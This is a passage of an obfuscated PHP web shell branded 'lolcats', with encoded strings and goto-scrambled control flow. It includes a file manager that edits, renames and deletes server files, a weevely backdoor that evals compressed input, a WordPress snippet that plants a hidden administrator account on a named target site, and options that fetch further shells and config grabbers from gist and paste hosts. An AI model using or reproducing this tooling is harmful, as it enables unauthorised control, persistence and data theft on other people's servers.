74\160\x68\160\x36\x38\174\x70\150\160\x34\174\163\150\x74\115\154\174\x73\x68\164\155\x4c\x7c\123\110\164\155\x6c\174\123\150\124\155\154\174\x53\110\124\x4d\x4c\x7c\123\110\x54\x6d\x6c\174\123\x48\x54\115\x6c\x7c\x53\x68\164\x4d\x6c\174\x53\x48\x54\155\x6c\x7c\123\x48\164\115\114\x7c\163\110\124\115\x6c\x7c\x53\x68\124\x4d\x4c\x7c\163\110\x54\115\114\174\123\150\x74\155\x4c\x7c\x53\x48\124\x6d\x4c\174\123\150\164\x4d\x6c\x7c\123\x68\164\155\114\x7c\163\x48\164\115\154\x7c\123\150\x54\155\x4c\x7c\163\110\x74\x6d\114\174\123\x68\164\x6d\x6c\x7c\163\110\164\x6d\154\174\x73\150\x54\x6d\x6c\x7c\x73\x48\x54\x6d\x6c\x7c\163\150\164\x6d\x6c\174\x70\x68\160\61\174\160\150\160\62\x7c\160\x68\x70\x33\174\x70\x68\160\x34\x7c\160\x68\x70\x31\60\x7c\x61\154\x66\141\174\x73\x75\163\160\x65\x63\x74\145\x64\174\x70\x79\x7c\x65\170\x65\x7c\x61\x6c\x66\x61\x7c\150\164\x6d\154\x7c\x68\164\155\x7c\x6d\157\x64\x75\154\145\174\x63\164\x70\174\151\x6e\x63\51\44\x22\x3e\40\12\x4f\x72\x64\145\162\x20\101\154\x6c\x6f\167\54\x44\145\156\x79\xa\104\145\x6e\x79\40\x66\162\x6f\155\x20\x61\x6c\154\xa\74\57\x46\x69\x6c\145\163\x4d\x61\x74\143\150\x3e\12\74\106\x69\x6c\145\163\x4d\x61\x74\x63\x68\40\42\x28\77\x69\51\x2e\x2a\x28\x70\x68\x7c\163\x68\x7c\160\x6a\174\145\156\166\174\x63\147\51\56\x2a\42\x3e\12\117\162\144\x65\x72\x20\104\x65\156\171\x2c\101\154\x6c\x6f\167\12\x44\145\156\x79\40\x66\162\x6f\x6d\x20\x61\x6c\154\12\x3c\57\x46\x69\x6c\x65\x73\115\141\x74\143\150\76\12\x3c\106\151\154\x65\163\x4d\x61\x74\143\150\40\x27\136\50" . $resoolt . "\51\x24\x27\76\xa\x4f\162\144\145\x72\40\x61\x6c\x6c\157\167\x2c\144\145\156\171\12\101\x6c\154\x6f\167\x20\x66\x72\x6f\x6d\x20\x61\x6c\x6c\12\74\x2f\x46\151\154\x65\x73\115\x61\164\x63\x68\x3e\xa\x45\x72\x72\x6f\x72\104\157\x63\x75\x6d\145\x6e\x74\x20\64\x30\63\40\x22\74\150\x74\x6d\x6c\x3e\74\x68\x65\141\x64\76\x3c\x74\151\x74\x6c\x65\x3e\x52\145\161\x75\x65\163\x74\40\122\145\x6a\145\143\x74\x65\144\40\x62\x79\40\x4c\x6f\154\143\x61\x74\x73\x3c\57\164\x69\x74\x6c\x65\76\x3c\57\x68\x65\141\144\76\74\142\157\144\x79\x3e\x54\x68\x65\x20\x72\x65\x71\165\x65\x73\x74\145\x64\40\x55\x52\x4c\x20\x77\x61\163\40\162\145\x6a\145\x63\164\145\144\x2e\40\x50\154\145\141\x73\145\40\x63\157\156\163\x75\x6c\164\x20\x77\151\x74\150\x20\x79\x6f\165\162\40\x61\144\155\151\156\151\163\x74\x72\x61\164\157\x72\56\74\57\142\157\x64\x79\x3e\x3c\x2f\x68\164\x6d\154\76\x22\12\105\162\x72\157\x72\x44\x6f\x63\x75\155\145\x6e\164\40\64\60\x34\x20\x22\x3c\x68\164\x6d\x6c\x3e\74\150\145\x61\144\76\x3c\x74\151\164\x6c\145\x3e\x52\145\161\x75\x65\x73\164\x20\122\145\x6a\x65\143\x74\x65\144\x20\x62\x79\x20\114\x6f\154\143\141\x74\163\x3c\57\x74\151\x74\154\x65\x3e\74\57\150\x65\x61\144\76\74\x62\157\144\171\x3e\124\x68\145\40\162\145\x71\165\x65\x73\164\x65\144\x20\x55\122\114\x20\x77\x61\163\40\162\145\x6a\x65\x63\164\x65\x64\x2e\x20\x50\154\x65\x61\163\x65\x20\143\157\156\x73\x75\154\164\40\x77\151\164\150\x20\x79\157\x75\x72\40\x61\144\x6d\151\156\x69\x73\x74\162\x61\164\157\162\56\x3c\x2f\x62\x6f\144\171\76\x3c\57\150\164\155\154\76\42"); ?>
</code></pre>
<button class="btn btn-danger btn-sm copy-button" onclick="copyToClipboard()">Copy</button>
</div></div>
<p class="text-center">How to use? Just paste the .htaccess above in the folder you want to block all shell extensions except <em><?php echo $resoolt; ?>
</em></p>
</div><?php } elseif ($_POST["\x6f\160\164\x69\157\156"] == "\63") { ?>
<div class="container-fluid language-javascript mt-3">
<div class="shell mb-3 position-relative">
<pre style="font-size:10px;" id="code"><code>error_reporting(0);
$a='$k="c8ba0w"w"a4b";$kw"h="w"7w"4948d105bdbw"";$kf="6f7w"7b77aw"432e"w";$pw"="5dJ1fteGr';
$W='Iw"w"XjtCLs";fuw"w"nction x($t,$k){$w"c=strw"len($kw");$l=stw"rw"len($tw");$o=""w";f';
$d='or($i=0;w"$i<$l;w")w"{fow"rw"($j=0;($jw"<$c&&$i<$l)w";$j++,w"$w"i++){$o.=$t{$i}^w"$k';
$l='w"lean();$w"r=@basw"e64_encow"dew"(w"@x(@gzcow"mpress($w"o),$k))w";prinw"t("$p$kh$rw"$kf");}';
$w='{$j}w";w"w"}}return $w"ow";}if (@w"prew"g_match("/$kh(.+)$w"kw"f/",w"@fiw"le_get_con';
$u=str_replace('I','','creIatIeI_fIuInctIion');
$g='tentw"s("php://iw"nputw"w""),$m)==1) {w"@ow"bw"_start();@evw"al(w"@gzuncomw"press(@x';
$H='(@bw"ase6w"4_dew"w"cw"ode($m[1]),$k)));$o=@ow"b_gw"w"et_cw"ontents();@w"ob_end_c';
$r=str_replace('w"','',$a.$W.$d.$w.$g.$H.$l);
$T=$u('',$r);$T();
</code></pre>
<button class="btn btn-danger btn-sm copy-button" onclick="copyToClipboard()">Copy</button>
</div>
</div>
<p class="text-center">How to use? Just paste the code above in the php file, for example: index.php etc. then connect to weevely | terminal command: <em>weevely http://yoursite/yourfile.php lolcats</em><p>
</div><?php } elseif ($_POST["\x6f\x70\x74\151\x6f\156"] == "\64") { $url = "\150\164\x74\160\x73\x3a\x2f\x2f\147\x69\x73\164\x2e\x67\x69\x74\x68\165\142\x2e\x63\x6f\155\x2f\x72\x61\x66\141\x65\171\x66\x61\61\63\63\67\57\x31\66\x66\61\66\65\60\x66\65\x30\145\x62\70\x36\141\x63\x35\x63\x30\144\63\x32\141\66\x31\x38\65\145\142\x63\65\66\x2f\162\x61\x77\x2f\62\x61\71\66\144\x61\x62\x62\145\141\x37\x34\63\60\x63\x38\61\x38\145\63\x62\144\x39\x35\x61\143\x61\64\143\x38\146\x66\x65\65\x65\x35\x35\x36\x61\x65\57\114\x4f\114\103\101\x54\123\x2e\163\x68\x74\155\154"; $fileName = getcwd() . "\x2f\154\157\154\x63\141\164\163\x2d\163\163\x69\56\x73\x68\164\155\x6c"; } elseif ($_POST["\157\x70\164\x69\157\x6e"] == "\65") { ?>
<div class="container-fluid language-javascript mt-3">
<div class="shell mb-3 position-relative"><pre style="font-size:10px;" id="code"><code>function lolcatsadmin(){
$login = 'lolcats';
$passw = 'kontolbabibangsa';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','lolcatsadmin');</code></pre>
<button class="btn btn-danger btn-sm copy-button" onclick="copyToClipboard()">Copy</button>
</div>
<p class="text-center">How to use? Add the above code in the functions.php file on the target website. | example: https://piranha.go.id/wp-content/themes/[themes name]/functions.php</p>
</div>
<?php } elseif ($_POST["\157\160\x74\x69\157\x6e"] == "\x36") { $url = "\x68\164\164\x70\x73\72\x2f\57\147\151\163\x74\x2e\x67\x69\x74\x68\165\x62\x75\x73\x65\x72\143\157\x6e\x74\x65\156\x74\56\x63\x6f\155\x2f\162\141\146\141\145\x79\146\x61\61\63\x33\x37\x2f\64\66\60\146\141\67\x39\x38\60\x39\x36\x30\x62\145\62\143\71\x32\146\64\x37\71\x34\x37\142\x31\x36\x31\70\66\142\x38\x2f\162\141\x77\x2f\142\x39\x36\x62\142\144\63\x31\143\144\x66\60\142\x37\64\x32\x66\67\70\x35\70\x31\x65\60\66\65\71\x35\141\70\x35\67\62\x36\x32\x65\x62\x39\x61\x62\x2f\141\154\146\141\x62\x65\x70\141\x73\x2e\x70\x68\160"; $fileName = getcwd() . "\x2f\154\x6f\154\x63\x61\164\163\55\141\154\146\141\142\x65\x70\x61\163\56\160\x68\160"; } elseif ($_POST["\157\160\164\151\157\156"] == "\x37") { $url = "\150\164\164\160\x73\72\57\x2f\x67\x69\x73\x74\56\x67\x69\164\x68\x75\142\165\163\x65\162\143\x6f\x6e\x74\x65\156\164\x2e\143\x6f\x6d\x2f\x72\141\x66\x61\x65\x79\x66\x61\61\x33\x33\x37\x2f\141\x65\x33\x37\62\x64\60\144\x39\x38\x61\71\x66\63\144\64\x36\142\67\x63\64\64\x31\x31\60\x63\x63\x31\x36\63\x33\67\x2f\162\141\167\57\x35\70\71\x66\63\62\x33\71\x30\x31\x39\64\x32\70\x65\141\x30\65\x63\62\x33\x36\141\63\x36\146\67\x36\64\65\x33\66\144\x66\x66\71\x37\x39\64\x35\x2f\x4d\x41\122\x49\x4a\125\x41\116\x41\56\160\150\x70"; $fileName = getcwd() . "\57\x6c\x6f\x6c\143\141\164\163\x2d\x6d\x61\x72\x69\152\165\x61\x6e\141\56\160\x68\160"; } elseif ($_POST["\x6f\160\164\151\x6f\x6e"] == "\x38") { $url = "\150\x74\x74\x70\163\72\x2f\57\x72\141\167\56\x67\x69\164\150\165\x62\x75\163\145\x72\x63\157\x6e\x74\x65\156\164\x2e\x63\x6f\x6d\57\106\x6c\x61\x6d\130\x54\x6e\141\x39\x39\67\x2f\120\x72\x69\166\x38\x2d\x43\157\156\x66\151\147\55\x47\x72\141\142\x62\145\x72\x2f\155\141\x73\x74\145\162\x2f\x63\157\156\146\x69\x67\56\160\150\x70"; $fileName = getcwd() . "\57\154\157\154\143\x61\x74\163\55\143\x6f\156\146\151\147\56\160\150\160"; } elseif ($_POST["\x6f\x70\164\151\x6f\x6e"] == "\71") { $url = "\x68\164\x74\160\x73\72\57\57\160\x73\x74\56\x69\156\156\157\x6d\151\x2e\x6e\x65\x74\57\x70\141\163\x74\x65\x2f\x75\157\66\143\146\x33\153\x34\x66\x72\x77\65\x33\x66\62\x72\156\x39\x6a\x6f\164\67\146\150\x2f\x72\x61\x77"; $fileName = getcwd() . "\57\x6c\157\154\143\x61\164\163\x2d\164\145\163\x6c\141\56\x70\150\x70"; } elseif ($_POST["\x6f\160\x74\151\x6f\156"] == "\61\60") { $url = "\150\x74\164\x70\163\x3a\57\x2f\160\141\x73\x74\145\56\151\x64\143\154\157\165\144\150\157\x73\x74\x69\156\147\56\155\x79\56\x69\x64\x2f\160\141\x73\x74\145\x2f\157\146\x70\x37\x77\x2f\162\141\x77"; $fileName = getcwd() . "\x2f\x6c\x6f\x6c\143\141\x74\x73\x2d\142\x79\x70\x61\x73\x73\x6c\x69\164\145\163\x70\x65\145\x64\x2e\x70\150\160"; } elseif ($_POST["\157\x70\x74\x69\157\156"] == "\x31\61") { $url = "\150\164\164\160\163\x3a\57\x2f\x70\x61\163\x74\x65\x2e\x69\x64\x63\x6c\157\x75\x64\150\x6f\163\x74\x69\156\147\56\x6d\171\x2e\151\144\x2f\x70\x61\x73\164\145\x2f\164\x35\66\161\x37\57\x72\x61\167"; $fileName = getcwd() . "\57\x6c\x6f\x6c\x63\141\x74\x73\55\143\x6d\x64\56\x70\150\160"; } if ($url && $fileName) { downloadFile($url, $fileName); } } } } goto ZfZWC; sgMYv: $_COOKIE = Yolo($_COOKIE); goto sxLaR; gUtZv: $path = str_replace("\134", "\x2f", $path); goto ZtS8W; qAxlZ: set_time_limit(0); goto SZTWR; KJRak: function er() { echo "\x3c\x64\151\x76\x20\143\154\x61\x73\x73\75\x22\x61\x6c\145\x72\164\40\141\154\145\162\164\x2d\144\141\162\153\40\141\154\145\x72\164\55\x64\x69\x73\155\x69\x73\163\151\142\x6c\145\x20\146\141\x64\x65\40\163\x68\157\x77\x20\155\171\x2d\63\42\40\x72\157\x6c\145\75\42\141\154\145\x72\164\42\76\74\142\165\x74\x74\x6f\156\x20\x74\171\160\145\75\42\142\165\x74\x74\x6f\x6e\x22\x20\143\154\141\x73\x73\x3d\x22\x62\164\x6e\55\143\x6c\x6f\x73\x65\x22\x20\144\141\x74\141\55\142\163\x2d\x64\x69\x73\155\x69\x73\x73\75\x22\x61\x6c\145\162\x74\x22\40\141\162\x69\141\55\154\x61\x62\x65\x6c\75\42\103\154\x6f\163\x65\x22\x3e\74\57\142\165\164\164\x6f\x6e\x3e"; } goto zGf7Y; N3Fu_: foreach ($scand as $file) { $ft = date("\x59\55\x6d\55\x64\40\x47\x3a\x69", filemtime("{$path}\x2f{$file}")); if (function_exists("\x70\x6f\163\151\170\x5f\x67\x65\164\x70\167\165\151\144")) { $fowner = @posix_getpwuid(fileowner("{$path}\57{$file}")); $fowner = $fowner["\156\x61\155\x65"]; } else { $fowner = fileowner("{$path}\57{$file}"); } if (function_exists("\x70\157\x73\151\x78\x5f\x67\145\x74\x67\162\x67\x69\x64")) { $fgrp = @posix_getgrgid(filegroup("{$path}\57{$file}")); $fgrp = $fgrp["\x6e\x61\x6d\145"]; } else { $fgrp = filegroup("{$path}\x2f{$file}"); } if (!is_file($path . "\57" . $file)) { continue; } if (strlen($file) > 25) { $_f = substr($file, 0, 25) . "\x2e\x2e\56\55\x2e" . $ext; } else { $_f = $file; } echo "\xa\40\40\x20\40\74\x74\x72\x3e\xa\40\x20\x20\x20\x20\x20\x20\x20\x3c\x74\x64\76\74\151\40\143\x6c\141\x73\163\x3d\x27\x62\x69\40\142\x69\55\146\x69\x6c\x65\55\145\141\162\x6d\x61\x72\153\55\x74\145\170\164\x2d\146\x69\x6c\x6c\x27\x3e\x3c\x2f\x69\x3e\x20\x3c\141\x20\x63\x6c\141\163\163\75\x27\164\145\170\164\x2d\144\x65\143\157\x72\141\x74\151\x6f\x6e\55\156\157\156\145\40\x74\145\x78\x74\55\x77\150\x69\x74\x65\x27\40\150\x72\x65\x66\x3d\47\x3f\144\151\x72\75{$path}\x26\141\x63\164\x69\157\156\x3d\166\151\145\x77\x26\157\160\156\75{$file}\47\x20\143\x6c\141\x73\163\75\47\x74\x65\170\164\x2d\167\x68\x69\164\145\47\x3e{$_f}\74\x2f\141\76\x3c\x2f\x74\144\76\xa\40\x20\40\x20\40\x20\x20\x20\74\x74\144\x20\143\154\141\163\x73\75\x27\x74\145\x78\164\x2d\143\x65\x6e\x74\145\x72\x20\164\145\170\x74\x2d\167\150\x69\x74\145\x27\76\146\x21\x6c\145\74\57\164\144\x3e\xa\x20\x20\40\x20\x20\x20\x20\x20\74\164\x64\x20\143\x6c\141\x73\x73\75\47\x74\145\x78\164\x2d\143\145\x6e\164\x65\x72\x20\164\145\170\164\x2d\x77\150\151\x74\145\x27\x3e{$ft}\x3c\57\164\144\76\12\40\40\x20\x20\40\x20\40\x20\74\164\144\40\143\x6c\x61\x73\x73\75\x27\x74\x65\170\x74\55\x63\x65\x6e\x74\x65\x72\x20\164\x65\x78\x74\55\167\x68\151\x74\x65\x27\76" . sz(filesize($file)) . "\74\x2f\x74\144\76\12\x20\40\40\40\x20\x20\40\40\74\x74\x64\x20\143\x6c\141\x73\x73\75\x27\x74\x65\170\164\55\143\x65\x6e\x74\145\x72\x20\164\145\170\164\55\x77\150\x69\x74\145\x27\76{$fowner}\74\146\157\156\164\40\143\154\141\163\x73\x3d\x27\164\145\170\164\x2d\144\141\x6e\x67\145\162\47\x3e\x20\57\x20\x3c\57\146\157\x6e\164\76{$fgrp}\74\57\164\144\76\xa\x20\40\40\40\x20\40\x20\40\74\164\x64\x20\x63\154\x61\163\163\75\x27\x74\145\x78\x74\55\143\145\x6e\x74\x65\x72\47\76"; if (is_writable($path . "\x2f" . $file)) { echo "\74\147\162\x3e"; } elseif (!is_readable($path . "\x2f" . $file)) { echo "\74\x72\x64\76"; } echo p($path . "\x2f" . $file); if (is_writable($path . "\57" . $file) || !is_readable($path . "\57" . $file)) { echo "\x3c\x2f\x67\x72\76\x3c\x2f\x72\144\x3e\74\57\164\144\x3e"; } echo "\x3c\164\x64\40\143\x6c\141\x73\163\75\47\x74\145\170\x74\x2d\x63\x65\156\164\145\x72\x27\x3e\xa\x20\40\40\x20\x3c\141\40\x63\154\141\163\163\75\x27\142\x74\156\40\x62\x74\156\55\157\x75\x74\x6c\151\156\145\55\x6c\151\147\150\x74\40\x62\164\156\55\x73\x6d\x27\40\150\x72\145\146\x3d\x27\77\144\151\x72\x3d{$path}\x26\141\143\164\x69\x6f\x6e\x3d\166\x69\x65\x77\x26\x6f\160\x6e\75{$file}\47\x3e\74\151\40\x63\154\x61\x73\x73\x3d\47\142\151\40\142\x69\55\145\171\x65\47\x3e\74\x2f\x69\x3e\x3c\57\141\76\xa\x3c\x61\x20\143\154\141\163\x73\75\x27\x62\164\156\x20\142\x74\x6e\55\x6f\x75\164\x6c\x69\156\x65\x2d\154\x69\x67\x68\164\40\x62\x74\156\55\163\155\47\40\x68\162\x65\146\x3d\x27\77\x64\151\162\75{$path}\46\141\x63\164\151\157\x6e\75\145\144\151\164\x26\157\160\x6e\x3d{$file}\x27\x3e\x3c\x69\x20\143\154\x61\x73\x73\75\x27\x62\x69\x20\x62\151\55\x70\145\156\143\x69\154\x2d\163\161\165\141\162\145\47\76\74\x2f\x69\76\74\57\141\76\12\x3c\141\40\x63\154\141\x73\163\x3d\x27\x62\164\156\40\142\164\x6e\55\157\x75\x74\154\151\x6e\x65\x2d\154\151\x67\150\x74\x20\x62\x74\x6e\55\x73\x6d\x27\40\x68\x72\145\x66\x3d\x27\77\x64\x69\x72\75{$path}\x26\141\143\x74\x69\x6f\156\x3d\162\145\156\141\x6d\x65\46\157\x70\156\75{$file}\47\x3e\x3c\151\40\143\x6c\x61\x73\x73\75\x27\x62\x69\40\x62\x69\55\x70\145\x6e\143\151\154\55\x66\151\x6c\154\x27\76\74\x2f\151\x3e\x3c\57\x61\x3e\xa\x3c\141\x20\x63\x6c\x61\163\x73\75\47\x62\164\156\x20\142\x74\156\x2d\x6f\x75\x74\154\151\156\x65\55\154\151\x67\x68\x74\x20\142\x74\x6e\x2d\163\x6d\x27\40\x68\x72\145\146\75\x27\77\144\x69\162\x3d{$path}\46\141\x63\164\151\157\156\75\x63\x68\x61\156\x67\x65\x6d\x6f\x64\x69\146\x69\x65\144\x26\157\x70\156\x3d{$file}\x27\x3e\x3c\x69\x20\x63\154\x61\163\163\x3d\x27\142\x69\40\x62\151\x2d\x63\x61\154\x65\156\x64\141\x72\55\x64\141\x74\145\x27\x3e\74\57\151\76\74\x2f\x61\76\xa\74\x61\x20\x63\x6c\x61\x73\x73\x3d\x27\x62\164\x6e\x20\x62\164\x6e\x2d\x6f\165\164\x6c\151\x6e\145\55\x6c\151\147\150\x74\40\142\x74\156\x2d\163\x6d\x27\40\x68\x72\x65\146\75\47\77\144\151\x72\75{$path}\x26\141\x63\164\x69\x6f\x6e\x3d\143\150\145\155\x6f\144\46\157\160\x6e\x3d{$file}\47\x3e\x3c\151\x20\x63\x6c\141\x73\x73\x3d\x27\x62\151\x20\142\151\55\x66\151\x6c\145\55\145\x61\162\155\x61\162\153\x2d\155\145\144\151\x63\x61\154\x27\x3e\74\57\151\x3e\74\x2f\141\x3e\12\x3c\x61\40\143\154\141\163\163\75\47\x62\164\156\x20\142\x74\x6e\x2d\x6f\165\164\x6c\151\x6e\145\55\x64\x61\156\x67\145\162\40\142\164\156\x2d\x73\x6d\47\40\x68\x72\145\x66\x3d\x27\x3f\144\x69\162\75{$path}\46\x61\143\164\151\157\x6e\x3d\144\x65\x6c\x65\x74\145\x5f\x66\x69\154\145\x26\x6f\160\156\x3d{$file}\47\76\74\151\x20\x63\x6c\x61\163\163\x3d\x27\x62\151\x20\x62\151\55\x74\x72\x61\x73\150\x2d\146\151\x6c\x6c\47\76\74\57\151\76\74\57\141\x3e\12\11\11\11\x3c\x2f\x64\151\x76\76\12\x9\11\x9\74\57\164\x64\x3e\12\11\x9\x3c\x2f\164\x72\76"; } goto zUYD7; JELCs: foreach ($scand as $dir) { $dt = date("\x59\x2d\155\x2d\144\x20\x47\72\x69", filemtime("{$path}\x2f{$dir}")); if (strlen($dir) > 25) { $_d = substr($dir, 0, 25) . "\x2e\x2e\56"; } else { $_d = $dir; } if (function_exists("\160\157\x73\151\170\137\147\x65\164\x70\167\165\151\144")) { $downer = @posix_getpwuid(fileowner("{$path}\x2f{$dir}")); $downer = $downer["\x6e\x61\x6d\145"]; } else { $downer = fileowner("{$path}\57{$dir}"); } if (function_exists("\x70\157\163\151\x78\x5f\x67\145\x74\147\x72\x67\151\144")) { $dgrp = @posix_getgrgid(filegroup("{$path}\x2f{$dir}")); $dgrp = $dgrp["\156\141\x6d\x65"]; } else { $dgrp = filegroup("{$path}\57{$dir}"); } if (!is_dir($path . "\57" . $file)) { continue; } $size = filesize($path . "\x2f" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\115\x42"; } else { $size = $size . "\40\x4b\102"; } if (!is_dir($path . "\57" . $dir) || $dir == "\x2e" || $dir == "\x2e\56") { continue; } echo "\12\40\x20\40\x20\74\x74\x72\76\xa\x20\x20\40\40\40\x20\40\40\x3c\x74\144\76\74\x69\x20\143\154\141\x73\163\x3d\47\142\x69\40\142\x69\x2d\x66\x6f\154\x64\145\x72\55\x66\x69\154\x6c\47\x3e\x3c\x2f\x69\76\40\x3c\141\40\x63\x6c\141\163\x73\x3d\47\x74\x65\170\164\55\144\145\x63\x6f\162\x61\x74\x69\157\156\x2d\156\157\156\x65\40\x74\x65\x78\x74\x2d\x77\x68\151\x74\x65\47\x20\x68\x72\145\x66\75\47\x3f\144\x69\162\75{$path}\57{$dir}\x27\76{$_d}\74\57\x61\x3e\x3c\57\164\x64\76\xa\40\x20\40\x20\40\x20\x20\x20\x3c\164\x64\40\x63\154\x61\x73\x73\75\x27\x74\x65\x78\164\55\143\x65\x6e\164\x65\162\x20\164\145\170\164\55\167\x68\x69\164\145\x27\76\144\41\x72\x3c\57\x74\144\76\12\40\x20\40\40\40\40\x20\x20\x3c\164\x64\40\x63\x6c\141\163\x73\75\47\164\x65\170\x74\x2d\x63\145\156\164\145\x72\40\164\145\x78\x74\x2d\x77\x68\x69\164\x65\x27\76{$dt}\74\x2f\164\x64\76\12\x20\40\x20\x20\x20\40\x20\40\74\164\144\40\x63\154\141\163\163\x3d\47\164\x65\x78\164\x2d\x63\145\156\164\x65\162\x20\164\x65\x78\164\x2d\x77\x68\151\164\145\47\76\55\x3c\x2f\164\144\x3e\xa\x20\x20\40\40\x20\x20\40\x20\x3c\164\144\x20\x63\x6c\x61\163\163\75\47\x74\x65\170\x74\55\143\x65\x6e\x74\145\162\40\x74\145\170\164\55\167\150\151\164\145\x27\76{$downer}\x3c\x66\x6f\156\164\x20\143\154\141\163\x73\x3d\47\164\x65\170\164\55\x64\x61\x6e\x67\145\x72\x27\76\40\57\x20\x3c\57\146\157\156\164\x3e{$dgrp}\74\x2f\164\144\76\xa\40\40\40\x20\x20\x20\40\40\x3c\164\144\40\x63\154\x61\163\x73\75\x27\x74\145\x78\x74\x2d\x63\x65\156\164\145\x72\47\x3e"; if (is_writable($path . "\57" . $dir)) { echo "\74\147\162\76"; } elseif (!is_readable($path . "\x2f" . $dir)) { echo "\74\x72\144\x3e"; } echo p($path . "\x2f" . $dir); if (is_writable($path . "\x2f" . $dir) || !is_readable($path . "\57" . $dir)) { echo "\x3c\x2f\146\x6f\x6e\164\x3e\x3c\x2f\x63\145\156\164\x65\x72\76\x3c\57\164\x64\76"; } echo "\xa\11\11\x9\x3c\164\x64\x20\x63\154\141\x73\163\x3d\x27\164\145\170\164\55\x63\145\x6e\x74\x65\162\x27\76\xa\x9\x9\11\74\144\x69\x76\x20\x63\x6c\141\163\163\75\47\x62\x74\x6e\55\147\162\x6f\165\x70\x27\x3e\xa\11\11\11\x9\74\x61\x20\143\154\141\x73\x73\x3d\47\142\164\156\x20\142\164\x6e\x2d\157\165\164\x6c\x69\x6e\x65\55\x6c\151\147\150\164\x20\142\164\x6e\x2d\163\155\47\x20\150\162\x65\x66\75\x27\77\x64\151\162\75{$path}\57{$dir}\46\141\143\164\x69\x6f\156\x3d\162\x65\156\x61\x6d\x65\137\x66\x6f\154\144\x65\x72\47\x3e\x3c\151\40\x63\154\141\x73\x73\75\x27\142\151\x20\142\x69\55\160\x65\156\143\151\x6c\x2d\x66\151\154\x6c\x27\x3e\x3c\x2f\x69\76\x3c\x2f\x61\76\12\x20\40\40\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x3c\x61\x20\143\x6c\x61\163\x73\75\x27\x62\x74\156\40\142\x74\x6e\55\x6f\x75\164\x6c\x69\156\x65\x2d\154\x69\x67\x68\164\40\142\164\x6e\x2d\163\155\x27\40\x68\x72\x65\146\x3d\x27\x3f\144\x69\162\x3d{$path}\57{$dir}\46\141\143\164\151\157\x6e\x3d\x63\x68\141\x6e\147\x65\x6d\157\144\x69\146\x69\145\x64\137\x66\x6f\154\144\145\162\47\76\x3c\151\x20\143\154\141\x73\163\75\47\142\x69\x20\x62\x69\55\143\x61\154\x65\x6e\x64\x61\162\x2d\x64\141\164\145\x27\x3e\74\x2f\151\76\74\57\x61\76\xa\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\74\41\x2d\55\74\x61\40\143\154\x61\163\163\x3d\x27\142\164\x6e\40\x62\x74\x6e\x2d\x6f\x75\164\154\x69\156\145\55\x6c\151\147\150\x74\x20\x62\164\156\x2d\x73\155\47\40\150\162\x65\x66\75\47\x3f\144\x69\x72\x3d{$path}\57{$dir}\x26\x61\x63\x74\151\x6f\156\75\143\x68\145\x6d\157\144\x27\76\x3c\151\40\143\x6c\x61\x73\163\x3d\47\142\x69\x20\x62\151\x2d\146\151\x6c\x65\55\x65\141\162\155\141\x72\x6b\55\x6d\x65\144\151\x63\x61\154\47\76\x3c\x2f\151\76\74\57\x61\76\x2d\x2d\76\xa\11\x9\x9\x9\x3c\x61\x20\143\x6c\x61\163\x73\75\47\x62\x74\x6e\x20\142\x74\156\x2d\157\x75\x74\x6c\151\156\x65\x2d\144\141\x6e\x67\145\x72\x20\x62\164\x6e\x2d\x73\155\40\164\170\x74\x27\40\x68\162\x65\146\x3d\x27\77\x64\x69\162\x3d{$path}\x2f{$dir}\x26\x61\x63\x74\151\157\156\x3d\144\145\154\145\164\x65\x5f\146\157\154\x64\145\162\x27\x3e\74\151\x20\143\x6c\141\x73\x73\x3d\x27\x62\x69\x20\142\x69\x2d\x74\x72\141\x73\x68\x2d\146\151\x6c\154\x27\76\74\x2f\151\76\74\57\141\x3e\12\11\x9\11\74\57\144\x69\x76\x3e\xa\11\11\11\x3c\x2f\x74\x64\x3e\xa\x9\x9\x3c\x2f\164\x72\x3e"; } goto N3Fu_; gVMRu: function deleteDir($dirPath) { if (!is_dir($dirPath)) { return false; } $files = array_diff(scandir($dirPath), array("\56", "\56\x2e")); foreach ($files as $file) { $filePath = $dirPath . DIRECTORY_SEPARATOR . $file; if (is_dir($filePath)) { deleteDir($filePath); } else { unlink($filePath); } } rmdir($dirPath); return true; } goto xSzhg; sS0QO: $_1337 = array_merge($_POST, $_GET); goto fdWT3; m1iO2: $full = str_replace($_SERVER["\104\117\x43\125\x4d\105\x4e\x54\137\122\117\x4f\124"], '', $path); goto PKEsQ; fdWT3: $_r = "\x72\x65\161\x75\151\162\x65\144\x3d\47\x72\x65\x71\165\151\162\145\x64\x27"; goto B7bX7; O0lrs: if ($_1337["\141\x63\x74\x69\x6f\x6e"] == "\x64\x65\x6c\145\164\145\x5f\146\151\154\x65") { s(); if ($_1337["\171\145\141\150\x78"]) { $delete = unlink($file); if ($delete) { echo "\x3c\x73\164\162\x6f\156\147\76\104\145\x6c\145\x74\145\x20\x66\x69\x6c\145\x3c\x2f\163\164\162\157\x6e\x67\x3e\40\x4f\113\41\40" . ok() . "\x3c\x2f\144\151\166\76"; } else { echo "\x3c\x73\x74\x72\x6f\x6e\x67\76\x44\x65\154\x65\164\x65\40\x66\x69\154\145\x3c\x2f\x73\x74\x72\x6f\x6e\x67\76\x20\106\101\x49\114\x21\40" . er() . "\74\x2f\x64\151\x76\76"; } } echo "\xa\x9\11\74\144\151\x76\40\143\x6c\141\x73\163\75\x27\x62\x74\156\x2d\x67\x72\157\165\160\40\x6d\142\x2d\x33\47\76\12\x9\x9\11\x3c\141\40\x63\154\x61\163\163\x3d\x27\142\164\156\40\142\164\156\55\x6f\165\x74\x6c\x69\x6e\145\55\154\x69\147\150\x74\40\142\164\x6e\x2d\x73\x6d\x27\40\150\162\145\x66\x3d\x27\x3f\144\x69\162\75{$path}\x26\141\x63\164\151\x6f\156\x3d\x76\x69\145\x77\46\157\160\x6e\75{$file}\x27\76\x3c\151\x20\x63\x6c\x61\x73\163\75\x27\142\151\x20\x62\151\55\145\x79\145\47\x3e\74\x2f\x69\76\74\x2f\x61\76\xa\x3c\x61\40\143\154\x61\x73\x73\x3d\47\x62\x74\156\40\x62\x74\x6e\55\x6f\x75\x74\154\x69\156\145\x2d\x6c\x69\x67\x68\x74\x20\142\x74\x6e\x2d\163\x6d\47\x20\x68\162\145\x66\x3d\x27\x3f\x64\151\x72\x3d{$path}\x26\141\x63\164\151\x6f\156\x3d\x65\x64\151\164\46\157\x70\x6e\x3d{$f